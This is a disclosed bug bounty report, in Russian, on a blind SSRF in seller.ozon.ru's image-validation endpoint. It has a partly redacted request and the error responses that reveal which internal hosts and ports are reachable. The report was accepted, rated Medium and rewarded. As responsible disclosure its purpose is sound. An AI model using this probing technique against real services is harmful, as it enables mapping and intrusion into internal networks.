Blind SSRF в методе валидации изображений [seller.ozon.ru]

Приветствую, в методе валидации изображений ##### присутствует SSRF.
Пример запроса:
 POST #####
 Host: seller.ozon.ru
 ...
 Accept-Language: ru
 Accept-Encoding: gzip, deflate, br
 Content-Type: application/json
 #####
 #####
 #####
 Content-Length: 46
 Origin: https://seller.ozon.ru
 Referer: #####
 Sec-Fetch-Dest: empty
 Sec-Fetch-Mode: cors
 Sec-Fetch-Site: same-origin
 Te: trailers
 
 {"urls":["http://##########"]}
В ответ приходит
 {"images":[{"srcUrl":"http://##########","url":"","name":"","#####":{"code":"too_small","message":"Размер файла меньше допустимого 171 < 512"}}]}
на запрос например такого урла http://
'{%mask_value%}
'{%mask_value%}
получаем:
 {"images":[{"srcUrl":"http://##########","url":"","name":"","#####":{"code":"http_error","message":"request process failed: unknown error connection refused"}}]}
или например для
'{%mask_value%}
получаем wrong content type
 {"images":[{"srcUrl":"#####","url":"","name":"","#####":{"code":"wrong_content_type","message":"wrong_content_type"}}]}
Домены
'{%mask_value%}
и
'{%mask_value%}
не резолвятся из внешней сети, получаем blind SSRF с возможностью посылать GET запросы во внутреннюю сеть, исследовать открытые порты и идентифицировать http сервисы
Reward
₽10,000
Ozon
Ozon
Report No.: 4152
Created: January 18, 2024, 18:47
Disclosed: April 16, 12:10
Status: Accepted
Type: Vulnerability
Severity:
Medium
CWE: CWE-918 Server-Side Request Forgery (SSRF)
Comments
By
Shumilishskii
January 19, 2024
By
Shumilishskii
January 25, 2024